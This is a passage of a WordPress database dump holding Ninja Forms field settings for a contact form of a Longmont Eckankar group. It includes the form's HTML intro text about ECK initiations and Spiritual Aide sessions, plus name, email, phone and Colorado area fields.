Here'),(4442,151,'type','textarea','type','textarea'),(4443,151,'key','enter_your_message_here_1515013766874','key','enter_your_message_here_1515013766874'),(4444,151,'label_pos','above','label_pos','above'),(4445,151,'required','1','required','1'),(4446,151,'default','','default',''),(4447,151,'placeholder','','placeholder',''),(4448,151,'container_class','','container_class',''),(4449,151,'element_class','','element_class',''),(4450,151,'input_limit','','input_limit',''),(4451,151,'input_limit_type','characters','input_limit_type','characters'),(4452,151,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(4453,151,'manual_key','','manual_key',''),(4454,151,'admin_label','','admin_label',''),(4455,151,'help_text','','help_text',''),(4456,151,'textarea_rte','','textarea_rte',''),(4457,151,'disable_rte_mobile','','disable_rte_mobile',''),(4458,151,'textarea_media','','textarea_media',''),(4459,151,'drawerDisabled','','drawerDisabled',''),(4460,151,'parent_id','14','parent_id','14'),(17519,626,'type','html','type','html'),(17518,626,'label','HTML','label','HTML'),(17517,626,'idAttribute','id','idAttribute','id'),(17515,626,'editActive','','editActive',''),(17516,626,'order','9','order','9'),(17514,625,'drawerDisabled','','drawerDisabled',''),(17513,625,'key','html_1663798119504','key','html_1663798119504'),(17512,625,'element_class','','element_class',''),(17511,625,'container_class','','container_class',''),(4473,153,'objectType','Field','objectType','Field'),(4474,153,'objectDomain','fields','objectDomain','fields'),(4475,153,'editActive','','editActive',''),(4476,153,'order','10','order','10'),(4477,153,'label','Submit','label','Submit'),(4478,153,'type','submit','type','submit'),(4479,153,'processing_label','Processing','processing_label','Processing'),(4480,153,'container_class','','container_class',''),(4481,153,'element_class','','element_class',''),(4482,153,'key','submit_1515013824829','key','submit_1515013824829'),(4483,153,'parent_id','14','parent_id','14'),(4484,154,'objectType','Field','objectType','Field'),(4485,154,'objectDomain','fields','objectDomain','fields'),(4486,154,'editActive','','editActive',''),(4487,154,'order','1','order','1'),(4488,154,'type','html','type','html'),(4489,154,'label','Text','label','Text'),(4490,154,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4491,154,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Longmont Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Longmont Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(4492,154,'desc_el','div','desc_el','div'),(4493,154,'show_desc','0','show_desc','0'),(4494,154,'desc_pos','none','desc_pos','none'),(4495,154,'desc_text','','desc_text',''),(4496,154,'element_class','','element_class',''),(4497,154,'default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Longmont Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Longmont Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(4498,154,'key','html_129','key','html_129'),(4499,154,'container_class','','container_class',''),(4500,154,'drawerDisabled','','drawerDisabled',''),(4501,154,'parent_id','15','parent_id','15'),(4502,155,'objectType','Field','objectType','Field'),(4503,155,'objectDomain','fields','objectDomain','fields'),(4504,155,'editActive','','editActive',''),(4505,155,'order','2','order','2'),(4506,155,'type','textbox','type','textbox'),(4507,155,'def_id','6','def_id','6'),(4508,155,'label','First Name','label','First Name'),(4509,155,'label_pos','above','label_pos','above'),(4510,155,'mask','','mask',''),(4511,155,'datepicker','0','datepicker','0'),(4512,155,'first_name','1','first_name','1'),(4513,155,'last_name','0','last_name','0'),(4514,155,'from_name','0','from_name','0'),(4515,155,'user_info_field_group','1','user_info_field_group','1'),(4516,155,'show_help','0','show_help','0'),(4517,155,'help_text','','help_text',''),(4518,155,'calc_auto_include','0','calc_auto_include','0'),(4519,155,'calc_option','0','calc_option','0'),(4520,155,'placeholder','','placeholder',''),(4521,155,'user_address_1','','user_address_1',''),(4522,155,'user_address_2','','user_address_2',''),(4523,155,'user_city','','user_city',''),(4524,155,'user_zip','','user_zip',''),(4525,155,'user_phone','','user_phone',''),(4526,155,'user_email','','user_email',''),(4527,155,'disable_input','0','disable_input','0'),(4528,155,'input_limit','','input_limit',''),(4529,155,'input_limit_type','char','input_limit_type','char'),(4530,155,'input_limit_msg','','input_limit_msg',''),(4531,155,'user_state','0','user_state','0'),(4532,155,'autocomplete_off','0','autocomplete_off','0'),(4533,155,'num_sort','0','num_sort','0'),(4534,155,'admin_label','','admin_label',''),(4535,155,'user_info_field_group_name','','user_info_field_group_name',''),(4536,155,'user_info_field_group_custom','','user_info_field_group_custom',''),(4537,155,'show_desc','0','show_desc','0'),(4538,155,'desc_pos','none','desc_pos','none'),(4539,155,'desc_text','','desc_text',''),(4540,155,'element_class','','element_class',''),(4541,155,'required','1','required','1'),(4542,155,'key','textbox_130','key','textbox_130'),(4543,155,'default','','default',''),(4544,155,'container_class','one-half first','container_class','one-half first'),(4545,155,'manual_key','','manual_key',''),(4546,155,'custom_mask','','custom_mask',''),(4547,155,'parent_id','15','parent_id','15'),(4548,156,'objectType','Field','objectType','Field'),(4549,156,'objectDomain','fields','objectDomain','fields'),(4550,156,'editActive','','editActive',''),(4551,156,'order','3','order','3'),(4552,156,'type','lastname','type','lastname'),(4553,156,'def_id','7','def_id','7'),(4554,156,'label','Last Name','label','Last Name'),(4555,156,'label_pos','above','label_pos','above'),(4556,156,'mask','','mask',''),(4557,156,'datepicker','0','datepicker','0'),(4558,156,'first_name','0','first_name','0'),(4559,156,'from_name','0','from_name','0'),(4560,156,'user_info_field_group','1','user_info_field_group','1'),(4561,156,'show_help','0','show_help','0'),(4562,156,'help_text','','help_text',''),(4563,156,'calc_auto_include','0','calc_auto_include','0'),(4564,156,'calc_option','0','calc_option','0'),(4565,156,'placeholder','','placeholder',''),(4566,156,'user_address_1','','user_address_1',''),(4567,156,'user_address_2','','user_address_2',''),(4568,156,'user_city','','user_city',''),(4569,156,'user_zip','','user_zip',''),(4570,156,'user_phone','','user_phone',''),(4571,156,'user_email','','user_email',''),(4572,156,'disable_input','0','disable_input','0'),(4573,156,'input_limit','','input_limit',''),(4574,156,'input_limit_type','char','input_limit_type','char'),(4575,156,'input_limit_msg','','input_limit_msg',''),(4576,156,'user_state','0','user_state','0'),(4577,156,'autocomplete_off','0','autocomplete_off','0'),(4578,156,'num_sort','0','num_sort','0'),(4579,156,'admin_label','','admin_label',''),(4580,156,'user_info_field_group_name','','user_info_field_group_name',''),(4581,156,'user_info_field_group_custom','','user_info_field_group_custom',''),(4582,156,'show_desc','0','show_desc','0'),(4583,156,'desc_pos','none','desc_pos','none'),(4584,156,'desc_text','','desc_text',''),(4585,156,'element_class','','element_class',''),(4586,156,'required','1','required','1'),(4587,156,'key','lastname_131','key','lastname_131'),(4588,156,'default','','default',''),(4589,156,'container_class','one-half','container_class','one-half'),(4590,156,'parent_id','15','parent_id','15'),(4591,157,'objectType','Field','objectType','Field'),(4592,157,'objectDomain','fields','objectDomain','fields'),(4593,157,'editActive','','editActive',''),(4594,157,'order','4','order','4'),(4595,157,'type','email','type','email'),(4596,157,'def_id','14','def_id','14'),(4597,157,'label','Email','label','Email'),(4598,157,'label_pos','above','label_pos','above'),(4599,157,'mask','','mask',''),(4600,157,'datepicker','0','datepicker','0'),(4601,157,'first_name','0','first_name','0'),(4602,157,'last_name','0','last_name','0'),(4603,157,'from_name','0','from_name','0'),(4604,157,'user_address_1','0','user_address_1','0'),(4605,157,'user_address_2','0','user_address_2','0'),(4606,157,'user_city','0','user_city','0'),(4607,157,'user_zip','0','user_zip','0'),(4608,157,'user_phone','0','user_phone','0'),(4609,157,'user_info_field_group','1','user_info_field_group','1'),(4610,157,'show_help','0','show_help','0'),(4611,157,'help_text','','help_text',''),(4612,157,'calc_auto_include','0','calc_auto_include','0'),(4613,157,'calc_option','0','calc_option','0'),(4614,157,'placeholder','','placeholder',''),(4615,157,'disable_input','0','disable_input','0'),(4616,157,'input_limit','','input_limit',''),(4617,157,'input_limit_type','char','input_limit_type','char'),(4618,157,'input_limit_msg','','input_limit_msg',''),(4619,157,'user_state','0','user_state','0'),(4620,157,'autocomplete_off','0','autocomplete_off','0'),(4621,157,'num_sort','0','num_sort','0'),(4622,157,'admin_label','','admin_label',''),(4623,157,'user_info_field_group_name','','user_info_field_group_name',''),(4624,157,'user_info_field_group_custom','','user_info_field_group_custom',''),(4625,157,'show_desc','0','show_desc','0'),(4626,157,'desc_pos','none','desc_pos','none'),(4627,157,'desc_text','','desc_text',''),(4628,157,'element_class','','element_class',''),(4629,157,'required','1','required','1'),(4630,157,'key','email_132','key','email_132'),(4631,157,'default','','default',''),(4632,157,'container_class','one-half first','container_class','one-half first'),(4633,157,'parent_id','15','parent_id','15'),(4634,158,'objectType','Field','objectType','Field'),(4635,158,'objectDomain','fields','objectDomain','fields'),(4636,158,'editActive','','editActive',''),(4637,158,'order','5','order','5'),(4638,158,'type','phone','type','phone'),(4639,158,'def_id','15','def_id','15'),(4640,158,'label','Phone','label','Phone'),(4641,158,'label_pos','above','label_pos','above'),(4642,158,'mask','(999) 999-9999','mask','(999) 999-9999'),(4643,158,'datepicker','0','datepicker','0'),(4644,158,'first_name','0','first_name','0'),(4645,158,'last_name','0','last_name','0'),(4646,158,'from_name','0','from_name','0'),(4647,158,'user_address_1','0','user_address_1','0'),(4648,158,'user_address_2','0','user_address_2','0'),(4649,158,'user_city','0','user_city','0'),(4650,158,'user_zip','0','user_zip','0'),(4651,158,'user_email','0','user_email','0'),(4652,158,'user_info_field_group','1','user_info_field_group','1'),(4653,158,'show_help','0','show_help','0'),(4654,158,'help_text','','help_text',''),(4655,158,'calc_auto_include','0','calc_auto_include','0'),(4656,158,'calc_option','0','calc_option','0'),(4657,158,'placeholder','','placeholder',''),(4658,158,'disable_input','0','disable_input','0'),(4659,158,'input_limit','','input_limit',''),(4660,158,'input_limit_type','char','input_limit_type','char'),(4661,158,'input_limit_msg','','input_limit_msg',''),(4662,158,'user_state','0','user_state','0'),(4663,158,'autocomplete_off','0','autocomplete_off','0'),(4664,158,'num_sort','0','num_sort','0'),(4665,158,'admin_label','','admin_label',''),(4666,158,'user_info_field_group_name','','user_info_field_group_name',''),(4667,158,'user_info_field_group_custom','','user_info_field_group_custom',''),(4668,158,'show_desc','0','show_desc','0'),(4669,158,'desc_pos','none','desc_pos','none'),(4670,158,'desc_text','','desc_text',''),(4671,158,'element_class','','element_class',''),(4672,158,'required','1','required','1'),(4673,158,'key','phone_133','key','phone_133'),(4674,158,'default','','default',''),(4675,158,'container_class','one-half','container_class','one-half'),(4676,158,'manual_key','','manual_key',''),(4677,158,'custom_mask','','custom_mask',''),(4678,158,'parent_id','15','parent_id','15'),(4679,159,'objectType','Field','objectType','Field'),(4680,159,'objectDomain','fields','objectDomain','fields'),(4681,159,'editActive','','editActive',''),(4682,159,'order','6','order','6'),(4683,159,'type','listselect','type','listselect'),(4684,159,'label','Your Local Area','label','Your Local Area'),(4685,159,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4686,159,'label_pos','above','label_pos','above'),(4687,159,'list_type','dropdown','list_type','dropdown'),(4688,159,'multi_size','5','multi_size','5'),(4689,159,'list_show_value','1','list_show_value','1'),(4690,159,'list','a:0:{}','list','a:0:{}'),(4691,159,'user_info_field_group','','user_info_field_group',''),(4692,159,'calc_auto_include','0','calc_auto_include','0'),(4693,159,'user_state','0','user_state','0'),(4694,159,'num_sort','0','num_sort','0'),(4695,159,'admin_label','','admin_label',''),(4696,159,'show_help','0','show_help','0'),(4697,159,'help_text','','help_text',''),(4698,159,'show_desc','0','show_desc','0'),(4699,159,'desc_pos','none','desc_pos','none'),(4700,159,'desc_text','','desc_text',''),(4701,159,'element_class','','element_class',''),(4702,159,'required','1','required','1'),(4703,159,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please 